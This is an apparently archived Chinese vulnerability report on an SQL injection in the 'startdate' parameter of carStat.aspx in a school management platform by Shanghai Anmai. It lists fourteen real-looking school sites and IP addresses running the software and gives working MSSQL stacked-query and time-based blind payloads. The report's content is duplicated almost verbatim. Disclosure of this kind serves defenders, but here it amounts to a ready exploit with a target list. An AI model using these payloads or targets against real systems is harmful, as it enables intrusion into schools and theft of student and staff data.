### 简要描述:
某学校综合管理系统通用SQL注入漏洞
### 详细说明:
系统名称:学校综合管理平台
厂商:上海安脉计算机科技有限公司
关键字:版权所有:上海安脉计算机科技有限公司
系统架构:ASPX+MSSQL
漏洞文件:OA/usecar/carStat.aspx
注入参数:startdate
枚举部分案例:
http://anmai.net:81/OA/usecar/carStat.aspx
http://jwxx.am.jsedu.sh.cn/ANMAI/OA/usecar/carStat.aspx
http://bssyxxgl.eicbs.com/OA/usecar/carStat.aspx
http://cjzx.am.jsedu.sh.cn/OA/usecar/carStat.aspx
http://glpt.nhshs.edu.sh.cn/OA/usecar/carStat.aspx
http://218.78.241.80/anmai/OA/usecar/carStat.aspx
http://www.aqyz.net/anmai/OA/usecar/carStat.aspx
http://218.22.96.74:8899/anmai/OA/usecar/carStat.aspx
http://120.69.153.68:8002/anmai654202_458357247/OA/usecar/carStat.aspx
http://222.82.229.202:2010/anmai/OA/usecar/carStat.aspx
http://58.118.20.5/anmai/OA/usecar/carStat.aspx
http://124.228.32.115:81/OA/usecar/carStat.aspx
http://luoxzx.am.jsedu.sh.cn/OA/usecar/carStat.aspx
http://www.syzxyz.com:8008/OA/usecar/carStat.aspx
漏洞验证:
这里以http://anmai.net:81/OA/usecar/carStat.aspx为例:
[<img src="https://images.seebug.org/upload/201503/19194413f8d66a26f8e6120c590473bd8b20eb32.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19194413f8d66a26f8e6120c590473bd8b20eb32.png)
```
Place: POST
Parameter: startdate
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=dDwtNTg3NzY1MDczO3Q8O2w8aTwxPjs O2w8dDw7bDxpPDExPjs O2w
8dDxwPGw8c3R5bGU7PjtsPFdJRFRIOiAyMDBweFw7Qk9SREVSLUNPTExBUFNFOiBjb2xsYXBzZTs Pjs
7Pjs Pjs PjtsPHJhZGlvMTtyYWRpbzI7cmFkaW8zOz4 eOIu6P466wBbRJJMGVTZGsfcbs4=&isOK=&
aa=3&startdate=2015-03-02'; WAITFOR DELAY '0:0:5'--&enddate=2015-03-18
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=dDwtNTg3NzY1MDczO3Q8O2w8aTwxPjs O2w8dDw7bDxpPDExPjs O2w
8dDxwPGw8c3R5bGU7PjtsPFdJRFRIOiAyMDBweFw7Qk9SREVSLUNPTExBUFNFOiBjb2xsYXBzZTs Pjs
7Pjs Pjs PjtsPHJhZGlvMTtyYWRpbzI7cmFkaW8zOz4 eOIu6P466wBbRJJMGVTZGsfcbs4=&isOK=&
aa=3&startdate=2015-03-02' WAITFOR DELAY '0:0:5'--&enddate=2015-03-18
```
[<img src="https://images.seebug.org/upload/201503/1919464678baac8dd8d9ff4db16897ccccf7a36b.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/1919464678baac8dd8d9ff4db16897ccccf7a36b.png)
数据库:
[<img src="https://images.seebug.org/upload/201503/19194517fc93bef952bcceb58ef6b6112e2a4206.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19194517fc93bef952bcceb58ef6b6112e2a4206.png)
### 漏洞证明:
系统名称:学校综合管理平台
厂商:上海安脉计算机科技有限公司
关键字:版权所有:上海安脉计算机科技有限公司
系统架构:ASPX+MSSQL
漏洞文件:OA/usecar/carStat.aspx
注入参数:startdate
枚举部分案例:
http://anmai.net:81/OA/usecar/carStat.aspx
http://jwxx.am.jsedu.sh.cn/ANMAI/OA/usecar/carStat.aspx
http://bssyxxgl.eicbs.com/OA/usecar/carStat.aspx
http://cjzx.am.jsedu.sh.cn/OA/usecar/carStat.aspx
http://glpt.nhshs.edu.sh.cn/OA/usecar/carStat.aspx
http://218.78.241.80/anmai/OA/usecar/carStat.aspx
http://www.aqyz.net/anmai/OA/usecar/carStat.aspx
http://218.22.96.74:8899/anmai/OA/usecar/carStat.aspx
http://120.69.153.68:8002/anmai654202_458357247/OA/usecar/carStat.aspx
http://222.82.229.202:2010/anmai/OA/usecar/carStat.aspx
http://58.118.20.5/anmai/OA/usecar/carStat.aspx
http://124.228.32.115:81/OA/usecar/carStat.aspx
http://luoxzx.am.jsedu.sh.cn/OA/usecar/carStat.aspx
http://www.syzxyz.com:8008/OA/usecar/carStat.aspx
漏洞验证:
这里以http://anmai.net:81/OA/usecar/carStat.aspx为例:
[<img src="https://images.seebug.org/upload/201503/19194413f8d66a26f8e6120c590473bd8b20eb32.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19194413f8d66a26f8e6120c590473bd8b20eb32.png)
```
Place: POST
Parameter: startdate
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=dDwtNTg3NzY1MDczO3Q8O2w8aTwxPjs O2w8dDw7bDxpPDExPjs O2w
8dDxwPGw8c3R5bGU7PjtsPFdJRFRIOiAyMDBweFw7Qk9SREVSLUNPTExBUFNFOiBjb2xsYXBzZTs Pjs
7Pjs Pjs PjtsPHJhZGlvMTtyYWRpbzI7cmFkaW8zOz4 eOIu6P466wBbRJJMGVTZGsfcbs4=&isOK=&
aa=3&startdate=2015-03-02'; WAITFOR DELAY '0:0:5'--&enddate=2015-03-18
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=dDwtNTg3NzY1MDczO3Q8O2w8aTwxPjs O2w8dDw7bDxpPDExPjs O2w
8dDxwPGw8c3R5bGU7PjtsPFdJRFRIOiAyMDBweFw7Qk9SREVSLUNPTExBUFNFOiBjb2xsYXBzZTs Pjs
7Pjs Pjs PjtsPHJhZGlvMTtyYWRpbzI7cmFkaW8zOz4 eOIu6P466wBbRJJMGVTZGsfcbs4=&isOK=&
aa=3&startdate=2015-03-02' WAITFOR DELAY '0:0:5'--&enddate=2015-03-18
```
[<img src="https://images.seebug.org/upload/201503/191946337d01976524a70082172286e73e70e022.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/191946337d01976524a70082172286e73e70e022.png)
数据库:
[<img src="https://images.seebug.org/upload/201503/19194517fc93bef952bcceb58ef6b6112e2a4206.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19194517fc93bef952bcceb58ef6b6112e2a4206.png)
暂无评论